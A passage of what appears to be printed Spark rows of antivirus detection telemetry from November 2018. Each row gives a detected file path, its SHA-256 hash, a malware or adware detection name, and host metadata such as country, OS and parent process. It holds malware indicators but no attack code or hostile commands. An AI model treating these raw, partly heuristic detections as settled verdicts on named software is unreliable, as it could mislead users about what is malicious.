\\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:09:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nso8DF5.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T13:14:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.15063.0_none_e6376d51f3e7328e\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freehdsport tv-bg.exe', filepath='\\\\?\\C:\\Program Files\\FreeHDSport TV\\FreeHDSport TV-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='d0d1d9e957e10e2f2b7d23c449216c31fc5f45125a39233909c35025b2b81306', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=324608, timestamp='2018-11-02T06:16:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00239886', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239886', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202151-ba0722e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202151-BA0722E0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140915-40073065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140915-40073065', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185803-254c9de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-185803-254C9DE6', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195338-6b05ac32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8121bda9\\AVSCAN-20181104-191248-159A46FF\\AVSCAN-20181104-195338-6B05AC32', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsqEFB1.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:42:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0006885.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{380D42AC-7531-4738-9953-A56FA241C116}\\RP1\\A0006885.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='f96902071114e0ed5c5581b0607a107c142d6bfd548f0525385eb95b18e02014', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:31:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295999', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295999', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:06:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102140-6e954efd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c12c1b6\\AVSCAN-20181104-102108-6B0E1B75\\AVSCAN-20181104-102140-6E954EFD', filesize=128000, name='HEUR/AGEN.1008916.#M1.#R1'), hash='d586d3d2f871ae3f9a246c72b4f792932468b4fb9e1d52f4e1b2b2ef708058b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:21:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mck.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\mck.exe', filesize=128000, name='HEUR/AGEN.1008916.#M1.#R1'), hash='d586d3d2f871ae3f9a246c72b4f792932468b4fb9e1d52f4e1b2b2ef708058b8', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T07:46:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='toolbar.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\Gutscheinmieze\\toolbar.dll', filesize=640000, name='TR/BHO.Gen.#M300.#R4364'), hash='ee8dd5bfe25e4e3eb0158f6f3c8d2012618e9b95de851d2b671ad19bb80bb857', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:rpALV6yNXEyOz\\\\\\/rP.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T08:36:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233141-1ae76a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b916499c\\AVSCAN-20181104-233029-113A621E\\AVSCAN-20181104-233141-1AE76A2D', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:31:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bubbles.scr', filepath='C:\\Windows\\System32\\Bubbles.scr', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='fe9373c258947de6542177be64329e8af9813e15ba4a8b1ca67fdd73ec58fa9a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:40:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='fd769a9c83d89f3ff40cf8b8cd651fee79f6133351a4e1522481a01c9c4e60f3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:00:25Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='ophcrack.exe', filepath='H:\\HBCD\\Programs\\OPHCrack.exe', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1DEBB93DB3C877B426D5B68A2574174410142B3B334DBD91F959D48322DFAB6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='00a3c546e50bcc946116950568bae407695fab708ed30c3bc73da15e28374224', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sessions.exe', filepath='C:\\Users\\X\\PrivacyPal Sessions\\Sessions.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7121431\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$140652,35478112,151552,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\clipgrab-3.7.1-cgorg.exe\\\\\\" \\\\\\/SPAWNWND=$707E0 \\\\\\/NOTIFYWND=$608BA ', country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-AQEK0.tmp\\clipgrab-3.7.1-cgorg.tmp', parentsize=1164288, timestamp='2018-11-02T08:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fb4_03.htm', filepath='C:\\orant\\TOOLS\\DOC60\\us\\D2k\\Fb\\fb4_03.htm', filesize=196000, name='HTML/Drop.VBS.A.#M1.#R1'), hash='0c7fa4ad513908b937feb30baa9a71ea7322b26acb5bb2642fa83a1ce2d894af', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233720-66a6150c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233720-66A6150C', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:37:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powerdata.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\PowerData.exe", filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d56d1baa6eebb29cbf977a6463cc935536dd10feb80ea6f83c4006de1bf6632.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\18.03.2018-296.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\1d56d1baa6eebb29cbf977a6463cc935536dd10feb80ea6f83c4006de1bf6632.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='1d56d1baa6eebb29cbf977a6463cc935536dd10feb80ea6f83c4006de1bf6632', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.04.2018-108.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T15:02:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101044-ad93efa7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101044-AD93EFA7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T00:09:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1  danh sach nhan vi-{ae52fda4-94bf-46d2-98c0-9060e4bcb754}-v4720038.xls', filepath='C:\\System Volume Information\\DFSR\\Private\\{5D15DB92-5FCD-4F87-A494-256E38C2C118}-{35D34436-B455-4AE7-977E-22A1521676FA}\\ConflictAndDeleted\\1  Danh sach nhan vi-{AE52FDA4-94BF-46D2-98C0-9060E4BCB754}-v4720038.xls', filesize=576000, name='X2000M/Agent.2067958.#M1.#R1'), hash='1a731e79f99d969c6088f2f4be6b62f0c87aa181944362b24e1a6a9b475a70eb', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dfsrs.exe', parentsize=None, timestamp='2018-11-02T09:10:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8642ebe2.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8642ebe2.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dpinst64.exe', filepath='D:\\User Before\\Lenovo Driver HRM\\Wireless_18.11.0_Ds64\\DPInst64.exe', filesize=1092000, name='W32/Neshta.A.#M1.#R1'), hash='23e6ee9ba866136e9c084b7021e88e8e51d3a3b544589c3a5fed10fc6c3cfc9f', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='arh.exe', filepath='C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\arh.exe', filesize=320000, name='W32/Jaik.mad.#M1.#R1'), hash='251dc70a463f8ac1b3e862673a4fe5c12b43f7fab6a5a6b4093f3a3dff78ab16', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:06:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T16:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140647-9abe40b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71d1a4db\\AVSCAN-20181102-140626-97123492\\AVSCAN-20181102-140647-9ABE40B6', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105536-4505b858', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105536-4505B858', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\SWDE\\C-SWDE\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:24:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-033652-7c577f94', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_e7062cd8\\AVSCAN-20181102-033613-76B534DF\\AVSCAN-20181102-033652-7C577F94', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134355-93892457', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134355-93892457', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:08Z'), dt=datetime.date(2018, 11, 2)),
